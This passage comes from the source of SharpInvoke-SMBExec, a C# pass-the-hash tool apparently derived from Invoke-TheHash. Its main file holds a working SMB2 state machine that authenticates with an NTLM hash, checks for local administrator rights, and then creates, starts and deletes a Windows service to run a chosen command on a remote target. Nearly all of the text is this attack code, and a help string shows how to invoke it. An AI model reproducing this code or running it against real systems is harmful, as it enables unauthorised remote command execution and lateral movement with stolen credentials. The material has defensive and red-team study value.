1354 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1355 | }
1356 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
1357 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1358 | SMBClientStage = "ReadRequest";
1359 | SMB_Client_Stage_Next = "CheckAccess";
1360 |
1361 | }
1362 | break;
1363 |
1364 | case "CheckAccess":
1365 | {
1366 | if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 128, 131)) == "00-00-00-00" && BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 127)) != "00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00")
1367 | {
1368 | SMB_Service_Manager_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 108, 127);
1369 | if (SMB_execute)
1370 | {
1371 | Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_Bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
1372 | SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
1373 | if (SCM_Data.Length < SMB_Split_Index)
1374 | {
1375 | SMBClientStage = "CreateServiceW";
1376 | }
1377 | else
1378 | {
1379 | SMBClientStage = "CreateServiceW_First";
1380 | }
1381 | }
1382 | else
1383 | {
1384 |
1385 | output.Append(String.Format("{0} is a local administrator on {1}", Output_Username, Target));
1386 | SMB2_Message_ID += 20;
1387 | SMB_Close_Service_Handle_Stage = 2;
1388 | SMBClientStage = "CloseServiceHandle";
1389 | }
1390 |
1391 | }
1392 | else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 128, 131)) == "05-00-00-00")
1393 | {
1394 | output.Append(String.Format("{0} is not a local administrator or does not have the required privileges on {1}", Output_Username, Target));
1395 | SMBExec_Failed = true;
1396 | }
1397 | else
1398 | {
1399 | output.Append(String.Format("Something went wrong with {0}", Target));
1400 | SMBExec_Failed = true;
1401 | }
1402 |
1403 | }
1404 | break;
1405 | case "CreateServiceW":
1406 | {
1407 | if (SMBExec_Command.Length < SMB_Split_Index)
1408 | {
1409 | SMB2_Message_ID += 20;
1410 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
1411 | Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
1412 | if (SMB_Signing)
1413 | {
1414 | Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
1415 | }
1416 | Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, null);
1417 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
1418 | Packet_SMB_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
1419 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
1420 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1421 | int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
1422 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
1423 | if (SMB_Signing)
1424 | {
1425 | HMAC_SHA256 = new HMACSHA256();
1426 | SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
1427 | SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
1428 | SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
1429 | Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
1430 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1431 | }
1432 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
1433 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1434 | SMBClientStage = "ReadRequest";
1435 | SMB_Client_Stage_Next = "StartServiceW";
1436 |
1437 | }
1438 | }
1439 | break;
1440 | case "CreateServiceW_First":
1441 | {
1442 | SMB_Split_Stage_final = Math.Ceiling((double)SCM_Data.Length / SMB_Split_Index);
1443 | SMB2_Message_ID += 20;
1444 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
1445 | Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
1446 | if (SMB_Signing)
1447 | {
1448 | Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
1449 | }
1450 |
1451 | byte[] SCM_Data_First = Utilities.GetByteRange(SCM_Data, 0, SMB_Split_Index - 1);
1452 | Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x01 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_First);
1453 | Packet_RPC_Data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_Data.Length);
1454 | SMB_Split_Index_Tracker = SMB_Split_Index;
1455 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
1456 | Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length);
1457 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1458 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
1459 | int RPC_Data_Length = SMB2_Data.Length + RPC_Data.Length;
1460 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
1461 | if (SMB_Signing)
1462 | {
1463 | HMAC_SHA256 = new HMACSHA256();
1464 | SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).ToArray();
1465 | SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
1466 | SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
1467 | Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
1468 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1469 | }
1470 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).ToArray();
1471 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1472 |
1473 | if (SMB_Split_Stage_final <= 2)
1474 | {
1475 | SMBClientStage = "CreateServiceW_Last";
1476 | }
1477 | else
1478 | {
1479 | SMB_Split_Stage = 2;
1480 | SMBClientStage = "CreateServiceW_Middle";
1481 | }
1482 | }
1483 | break;
1484 |
1485 | case "CreateServiceW_Middle":
1486 | {
1487 | SMB_Split_Stage++;
1488 | SMB2_Message_ID++;
1489 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
1490 | Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
1491 | if (SMB_Signing)
1492 | {
1493 | Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
1494 | }
1495 | byte[] SCM_Data_Middle = Utilities.GetByteRange(SCM_Data, SMB_Split_Index_Tracker, SMB_Split_Index_Tracker + SMB_Split_Index - 1);
1496 | SMB_Split_Index_Tracker += SMB_Split_Index;
1497 | Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x00 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_Middle);
1498 | Packet_RPC_Data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_Data.Length - SMB_Split_Index_Tracker + SMB_Split_Index);
1499 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
1500 | Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length);
1501 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1502 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
1503 | int RPC_Data_Length = SMB2_Data.Length + RPC_Data.Length;
1504 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
1505 | if (SMB_Signing)
1506 | {
1507 | HMAC_SHA256 = new HMACSHA256();
1508 | SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).ToArray();
1509 | SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
1510 | SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
1511 | Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
1512 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1513 | }
1514 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).ToArray();
1515 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1516 | if (SMB_Split_Stage >= SMB_Split_Stage_final)
1517 | {
1518 | SMBClientStage = "CreateServiceW_Last";
1519 | }
1520 | else
1521 | {
1522 | SMBClientStage = "CreateServiceW_Middle";
1523 | }
1524 | }
1525 | break;
1526 |
1527 | case "CreateServiceW_Last":
1528 | {
1529 | SMB2_Message_ID++;
1530 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
1531 | Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
1532 | if (SMB_Signing)
1533 | {
1534 | Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
1535 | }
1536 | byte[] SCM_Data_Last = Utilities.GetByteRange(SCM_Data, SMB_Split_Index_Tracker, SCM_Data.Length);
1537 | Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x02 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_Last);
1538 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
1539 | Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length);
1540 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1541 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
1542 | int RPC_Data_Length = SMB2_Data.Length + RPC_Data.Length;
1543 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
1544 | if (SMB_Signing)
1545 | {
1546 | HMAC_SHA256 = new HMACSHA256();
1547 | SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).ToArray();
1548 | SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
1549 | SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
1550 | Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
1551 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1552 | }
1553 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).ToArray();
1554 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1555 | SMBClientStage = "ReadRequest";
1556 | SMB_Client_Stage_Next = "StartServiceW";
1557 | }
1558 | break;
1559 |
1560 | case "StartServiceW":
1561 | {
1562 | if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 132, 135)) == "00-00-00-00")
1563 | {
1564 | if (debug) { output.Append(String.Format("Service {0} created on {1}", SMB_Service, Target)); }
1565 | SMB_Service_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 112, 131);
1566 | SMB2_Message_ID += 20;
1567 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
1568 | Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
1569 | if (SMB_Signing)
1570 | {
1571 | Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
1572 | }
1573 | Packet_SCM_Data = SMBExec.SCMStartServiceW(SMB_Service_Context_Handle);
1574 | SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
1575 | Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x13, 0x00 }, null);
1576 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
1577 | Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
1578 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1579 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
1580 | int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
1581 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
1582 | if (SMB_Signing)
1583 | {
1584 | HMAC_SHA256 = new HMACSHA256();
1585 | SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
1586 | SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
1587 | SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
1588 | Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
1589 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1590 | }
1591 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
1592 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1593 | SMBClientStage = "ReadRequest";
1594 | SMB_Client_Stage_Next = "DeleteServiceW";
1595 | }
1596 | else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 132, 135)) == "31-04-00-00")
1597 | {
1598 | if (debug) { output.Append(String.Format("Service {0} creation failed on {1}", SMB_Service, Target)); }
1599 | SMBExec_Failed = true;
1600 | }
1601 | else
1602 | {
1603 | if (debug) { output.Append("Service Creation Fault Context Mismatch."); }
1604 | SMBExec_Failed = true;
1605 | }
1606 | }
1607 | break;
1608 |
1609 | case "DeleteServiceW":
1610 | {
1611 | if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "1d-04-00-00")
1612 | {
1613 | output.Append(String.Format("Command executed with service {0} on {1}", SMB_Service, Target));
1614 | }
1615 | else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "02-00-00-00")
1616 | {
1617 | output.Append(String.Format("Service {0} failed to start on {1}", SMB_Service, Target));
1618 | }
1619 |
1620 | SMB2_Message_ID += 20;
1621 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
1622 | Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
1623 | if (SMB_Signing)
1624 | {
1625 | Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
1626 | }
1627 |
1628 | Packet_SCM_Data = SMBExec.SCMDeleteServiceW(SMB_Service_Context_Handle);
1629 | SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
1630 | Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
1631 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
1632 | Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
1633 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1634 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
1635 | int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
1636 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
1637 | if (SMB_Signing)
1638 | {
1639 | HMAC_SHA256 = new HMACSHA256();
1640 | SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
1641 | SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
1642 | SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
1643 | Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
1644 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1645 | }
1646 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
1647 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1648 | SMBClientStage = "ReadRequest";
1649 | SMB_Client_Stage_Next = "CloseServiceHandle";
1650 | SMB_Close_Service_Handle_Stage = 1;
1651 | }
1652 | break;
1653 |
1654 | case "CloseServiceHandle":
1655 | {
1656 | if (SMB_Close_Service_Handle_Stage == 1)
1657 | {
1658 | if (debug) { output.Append(String.Format("Service {0} deleted on {1}", SMB_Service, Target)); }
1659 | Service_Deleted = true;
1660 | SMB2_Message_ID += 20;
1661 | SMB_Close_Service_Handle_Stage++;
1662 | Packet_SCM_Data = SMBExec.SCMCloseServiceHandle(SMB_Service_Context_Handle);
1663 | }
1664 | else
1665 | {
1666 | SMB2_Message_ID++;
1667 | SMBClientStage = "CloseRequest";
1668 | Packet_SCM_Data = SMBExec.SCMCloseServiceHandle(SMB_Service_Manager_Context_Handle);
1669 | }
1670 | if (SMB_Signing)
1671 | {
1672 | Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
1673 | }
1674 |
1675 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
1676 | Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
1677 | SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
1678 | Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
1679 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
1680 | Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
1681 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1682 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
1683 | int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
1684 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
1685 | if (SMB_Signing)
1686 | {
1687 | HMAC_SHA256 = new HMACSHA256();
1688 | SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
1689 | SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
1690 | SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
1691 | Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
1692 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1693 | }
1694 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
1695 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1696 |
1697 | }
1698 | break;
1699 | case "CloseRequest":
1700 | {
1701 | SMB2_Message_ID += 20;
1702 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x06, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
1703 | Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
1704 | if (SMB_Signing)
1705 | {
1706 | Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
1707 | }
1708 |
1709 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1710 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
1711 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
1712 | if (SMB_Signing)
1713 | {
1714 | HMAC_SHA256 = new HMACSHA256();
1715 | SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
1716 | SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
1717 | SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
1718 | Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
1719 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1720 | }
1721 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
1722 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1723 | SMBClientStage = "TreeDisconnect";
1724 | }
1725 | break;
1726 |
1727 | case "TreeDisconnect":
1728 | {
1729 | SMB2_Message_ID++;
1730 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x04, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
1731 | Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
1732 | if (SMB_Signing)
1733 | {
1734 | Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
1735 | }
1736 | Packet_SMB2_Data = SMBExec.SMB2TreeDisconnectRequest();
1737 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1738 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
1739 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
1740 | if (SMB_Signing)
1741 | {
1742 | HMAC_SHA256 = new HMACSHA256();
1743 | SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
1744 | SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
1745 | SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
1746 | Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
1747 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1748 | }
1749 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
1750 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1751 | SMBClientStage = "Logoff";
1752 | }
1753 | break;
1754 | case "Logoff":
1755 | {
1756 | SMB2_Message_ID += 20;
1757 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x02, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
1758 | Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
1759 | if (SMB_Signing)
1760 | {
1761 | Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
1762 | }
1763 | Packet_SMB2_Data = SMBExec.SMB2SessionLogoffRequest();
1764 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1765 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
1766 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
1767 | if (SMB_Signing)
1768 | {
1769 | HMAC_SHA256 = new HMACSHA256();
1770 | SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
1771 |
1772 | SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
1773 | SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
1774 | Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
1775 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
1776 | }
1777 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
1778 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
1779 | SMBClientStage = "exit";
1780 | }
1781 | break;
1782 | }
1783 | }
1784 | }
1785 | if (!Service_Deleted && !AdminCheck)
1786 | {
1787 | output.Append("Warning: Service not deleted. Please delete Service \"" + SMB_Service + "\" manually.");
1788 | }
1789 | }
1790 | SMBClient.Close();
1791 | SMBClientStream.Close();
1792 | }
1793 |
1794 | Console.WriteLine(output.ToString());
1795 | }
1796 |
1797 | public static void displayHelp(string message)
1798 | {
1799 | Console.WriteLine("{0} \r\nSharp-InvokeSMBxec.exe username: domain: hash: target: command:", message);
1800 | Environment.Exit(-1);
1801 | }
1802 |
1803 | private static byte[] SendStream(NetworkStream stream, byte[] BytesToSend)
1804 | {
1805 | byte[] BytesReceived = new byte[2048];
1806 | stream.Write(BytesToSend, 0, BytesToSend.Length);
1807 | stream.Flush();
1808 | stream.Read(BytesReceived, 0, BytesReceived.Length);
1809 | return BytesReceived;
1810 | }
1811 |
1812 | private static byte[] GetNetBIOSSessionService(int SMB_Header_Length, int RPC_Data_Length)
1813 | {
1814 | OrderedDictionary Packet_NetBIOS_Session_Service = SMBExec.NetBIOSSessionService(SMB_Header_Length, RPC_Data_Length);
1815 | byte[] NetBIOS_Session_Service = Utilities.ConvertFromPacketOrderedDictionary(Packet_NetBIOS_Session_Service);
1816 | return NetBIOS_Session_Service;
1817 |
1818 | }
1819 |
1820 | }
1821 | }
1822 |
--------------------------------------------------------------------------------
/SharpInvoke-SMBExec/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("SharpInvoke-SMBExec")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SharpInvoke-SMBExec")]
13 | [assembly: AssemblyCopyright("Copyright © 2017")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("344ee55a-4e32-46f2-a003-69ad52b55945")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SharpInvoke-SMBExec/SMBExec.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Specialized;
3 | using System.Linq;
4 |
5 | namespace SharpInvoke_SMBExec
6 | {
7 | public class SMBExec
8 | {
9 | ///
10 | /// SMBExec contains all of the functions used to manually create SMB Packet Structures for Pass the Hash attacks.
11 | ///
12 | ///
13 | /// Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
14 | /// at https://github.com/Kevin-Robertson/Invoke-TheHash)
15 | ///
16 |
17 | #region SMBv1
18 | public static OrderedDictionary NetBIOSSessionService(int packet_header_length, int packet_data_length)
19 | {
20 | byte[] packet_netbios_session_service_length = BitConverter.GetBytes(packet_header_length + packet_data_length);
